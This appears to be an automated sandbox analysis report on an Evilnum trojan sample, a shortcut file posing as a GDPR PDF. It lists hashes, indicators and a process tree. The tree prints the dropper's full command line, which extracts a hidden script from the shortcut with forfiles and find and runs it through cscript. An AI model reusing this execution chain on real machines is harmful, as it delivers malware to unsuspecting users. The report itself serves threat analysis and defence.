evilnum | 69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4

Analysis

Target

69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4.lnk
Size

165KB
MD5

e07c8e2f268018c7a751998dec8502c7
SHA1

a5c91e06881e19079b7e8496c6f229a790e8c1ee
SHA256

69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4
SHA512

4b2537fe55d06acfb82ad24bca1ac00bb561a430a8668345141fdd72aac7f920d6a1daaad9b42fda5a1b6ddc5f823295cb0bcc01dbe639c467fc3c68dfa1b3d8

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 952 wrote to memory of 652	952	cmd.exe	28
PID 952 wrote to memory of 652	952	cmd.exe	28
PID 952 wrote to memory of 652	952	cmd.exe	28
PID 652 wrote to memory of 468	652	cmd.exe	29
PID 652 wrote to memory of 468	652	cmd.exe	29
PID 652 wrote to memory of 468	652	cmd.exe	29
PID 652 wrote to memory of 732	652	cmd.exe	31
PID 652 wrote to memory of 732	652	cmd.exe	31
PID 652 wrote to memory of 732	652	cmd.exe	31
PID 652 wrote to memory of 532	652	cmd.exe	30
PID 652 wrote to memory of 532	652	cmd.exe	30
PID 652 wrote to memory of 532	652	cmd.exe	30
PID 652 wrote to memory of 1060	652	cmd.exe	32
PID 652 wrote to memory of 1060	652	cmd.exe	32
PID 652 wrote to memory of 1060	652	cmd.exe	32
PID 652 wrote to memory of 636	652	cmd.exe	33
PID 652 wrote to memory of 636	652	cmd.exe	33
PID 652 wrote to memory of 636	652	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "GDPR-EXANTE2020.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "GDPR*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "GDPR*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:468
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1060
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:636

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/952-53-0x000007FEFB8C1000-0x000007FEFB8C3000-memory.dmp

Filesize
8KB

Download